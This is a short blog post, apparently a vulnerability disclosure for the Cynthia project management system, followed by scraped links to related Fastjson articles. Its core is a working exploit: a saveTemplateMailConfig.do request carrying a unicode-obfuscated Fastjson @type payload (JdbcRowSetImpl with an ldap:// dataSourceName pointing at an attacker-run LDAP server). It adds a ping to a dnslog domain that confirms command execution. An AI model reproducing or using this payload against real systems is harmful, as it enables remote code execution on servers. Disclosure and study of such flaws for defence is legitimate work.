Cynthia - Fastjson deserialization vulnerability

最新推荐文章于 2024-08-31 06:45:00 发布
最新推荐文章于 2024-08-31 06:45:00 发布
阅读量3.5k 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41575340/article/details/123742746
版权

This is a Fastjson deserialization vulnerability

1.login fast
Login required
login

2.Fastjson deserialization
Trigger point
http://xx.xxx.xxx.xx/cynthia/template/saveTemplateMailConfig.do?templateId=744313&templateMailOptions={“b”:{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":“ldap://xx.xx.xx.xx:1389/wj0bb4”,“autoCommit”:true}}
在这里插入图片描述 Deploy malicious LDAP on the server ,then Request received
在这里插入图片描述 ping -c2 aa.lmy0c7.dnslog.cn The command is executed
在这里插入图片描述

qq_41575340
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JavaLearnVulnerability:Java漏洞学习笔记 Deserialization Vulnerability
05-12
JavaLearnVulnerability Java漏洞学习代码及笔记 项目TODO 漏洞代码完善中 漏洞使用和分析笔记准备中 目前文章分析地址在每一个包下package-info.java Java反序列化 Java反射 Java类加载 shiro漏洞分析 weblogic漏洞分析 fastjson漏洞分析 jackson漏洞分析 rmi、ldap spring漏洞分析 目前所有文章分析都在博客 后期会转到项目下,所有的分析文章写完之后统一转入。 项目优势: 1. 每一个漏洞环境都支持单独运行,方便分析 2. 漏洞都有分析文章,完全可以参考文章分析进行 3. 即使小白也能看懂 4. 每一个部分从基础的知识学习,再到漏洞实战分析,漏洞实战分析主要以最近几年的历史漏洞。 5. 由浅入深,由易到难。 项目说明 项目 说明 javatest 依赖文件都在lib目录下,
fastjson>=1.2.47反序列化漏洞复现及实际利用
weixin_42486411的博客
05-07 1160
嗯,这一定是傻子都能看得懂的文章! 1.环境搭建 用的是vulhub的环境,里面有各种各样的漏洞环境,简单看看说明就知道怎么操作了。 vulhub下载地址:https://github.com/vulhub/vulhub 在虚拟机上搭建好后看具体的说明文件,是访问8090端口: ok确认环境已搭建完毕! 2.编译恶意文件 vulhub里面的说明文件就给出了恶意文件的内容: 将这段代码复制出来到文...
关于java反序列化漏洞(java deserialization vulnerability
msdnchina的专栏@JiNan,ShanDong
01-20 1848
java反序列化漏洞(java deserialization vulnerability
fastjson反序列化漏洞分析
m0_38043244的博客
06-02 2297
fastjson反序列化漏洞
21 - vulhub - fastjson 反序列化导致任意命令执行漏洞
易编橙 · 终身成长社群,相遇已是上上签!
11-16 1076
fastjson 阿里巴巴开发的一个JSON解析库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。
Cynthia-项目管理系统.zip
08-17
Cynthia-项目管理系统:基于Java的任务缺陷管理实践》 在信息技术领域,项目管理是确保高效、有序地完成任务的关键环节。"Cynthia-项目管理系统"是一个专为任务缺陷管理设计的应用,它采用Java编程语言进行开发,...
Cynthia-多功能月球营地机器人.pdf
08-13
根据提供的文件内容,以下是对标题“Cynthia-多功能月球营地机器人”和描述中所包含知识点的详细阐述: 1. 月球基地假设与月球车设计:文档中提到的多功能月球营地机器人是在月球基地假设的基础上设计的。月球基地...
mirrors-cynthia-master.zip_WINDOWS_
08-10
1. 巨大的灵活性,任何东西都是可以配置的,甚至包括整个流程、表单和人员角色,所以Cynthia不仅仅只用于问题管理,还可以用于需求管理、运维管理等各种工作流程系统 2. 丰富的统计报表,可以根据不同类型的统计方式...
Cynthia管理系统 v1.0-源码.zip
02-26
Cynthia管理系统 v1.0 源码分析与学习指南》 在IT行业中,源码的学习对于开发者来说是至关重要的。"Cynthia管理系统 v1.0-源码.zip" 提供了一个完整的软件开发实例,让我们有机会深入研究一个管理系统的内部运作...
Cynthia管理系统 v1.0
11-04
为您提供Cynthia管理系统下载,Cynthia是个问题管理/BUG管理/任务管理/项目管理系统。Cynthia提供了一个基于Web的、开源的、跨平台的软件项目管理和问题管理的解决方案。通过极大的灵活度,实现了特殊性和普遍性的...
Fastjson反序列化漏洞:深入探讨与安全防范
最新发布
xycxycooo的博客
08-31 865
通过本文的讲解,我们详细了解了Fastjson反序列化漏洞的原理、影响以及如何进行安全防范。Fastjson反序列化漏洞主要是由于Fastjson在反序列化过程中,对输入数据的安全性验证不足,导致攻击者可以构造恶意JSON数据,触发反序列化操作,进而执行任意代码或命令。为了避免这类漏洞,可以采取升级Fastjson版本、禁用@type自动类型解析、使用白名单机制和输入验证等安全防范措施。希望本文能够帮助你更好地理解和应用Fastjson反序列化漏洞的安全防范。如果你有任何问题或需要进一步的解释,请随时提问。
Fastjson反序列化高危漏洞系列-part2:1.2.68反序列化漏洞及利用链分析 (上)
mole_exp的博客
01-17 3080
文章目录前言 前言 本文是对fastjson高危漏洞的一次整理,包括漏洞调试、PoC构造和补丁分析。 上一篇传送门:Fastjson反序列化高危漏洞系列-part1:1.2.x — 1.2.47
Fastjson反序列化漏洞复现分析
include_voidmain的博客
03-25 5483
0x01 反序列化过程 fastjson将字符串转换为对象的方法主要有parse和parseObject 其中parseObject也会调用parse来解析json,下面来分析下反序列化过程 首先写一个测试的javabean public class TestBean { public String isMessage; public String message; public int id; public String getMessage() { System.out.println("getMess
Apereo CAS 4.1 Deserialization RCE Vulnerability
zzzzz1284的博客
01-04 264
Apereo CAS 4.1 Deserialization RCE Vulnerability
帆软报表导出总结
帆软爱好者的专栏
05-02 2069
下面总结一下导出的原理以及一些扩展点。我们知道帆软报表在预览的时候url一般为:http://localhost:8075/webroot/decision/view/report?viewlet=xxxx.cpt。 而当我们在报表界面中点击一些操作时,比如: 打印:http://localhost:8075/webroot/decision/view/report?op=fr_pdfprint&cmd=check_register PDF导出:http://localhost:8075/we
干掉 fastjson,我们用 Jackson!
芋艿V
03-18 2057
点击上方“芋道源码”,选择“设为星标”管她前浪,还是后浪?能浪的浪,才是好浪!每天 8:55 更新文章,每天掉亿点点头发...源码精品专栏原创 | Java 2020 超神之路,很肝~中...
Fastjson致命缺陷
SpringForAll的博客
10-27 2145
前言 这个周末被几个技术博主的同一篇公众号文章 fastjson又被发现漏洞,这次危害可导致服务瘫痪! 刷屏,离之前的漏洞事件没多久,FastJson 又出现严重 Bug。目前项目中不少使用了 FastJson 做对象与JSON数据的转换,又需要更新版本重新部署,可以说是费时费力。与此同时,也带给我新的思考,面对大量功能强大的开源库,我们不能盲目地引入到项目之中,众多开源框架中任一个不稳定因素就足...
fastjson 代码执行 (CNVD-2017-02833)复现
YouthBelief的博客
10-29 3028
文章目录前言一、fastjson 代码执行 (CNVD-2017-02833)0x01 漏洞描述0x02 影响范围0x03 漏洞利用1.直接用rce工具0x04 漏洞修复总结 前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象 一、fastjson 代码执行 (CNVD-2017-02833) 0x01 漏洞描述 fastjson在解析json的过程中,支持使用@type字段来指定反序列化的类型,并调用该类的s
"灵活配置、统计报表丰富的Cynthia:开源软件项目和问题管理解决方案
Cynthia是一个基于Web的、开源的、跨平台的软件项目管理和问题管理的解决方案。它通过极大的灵活性,将特殊性和普遍性进行了统一,使用户能够根据自己的实际情况配置问题的流转和数据模板。同时,Cynthia还内置了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值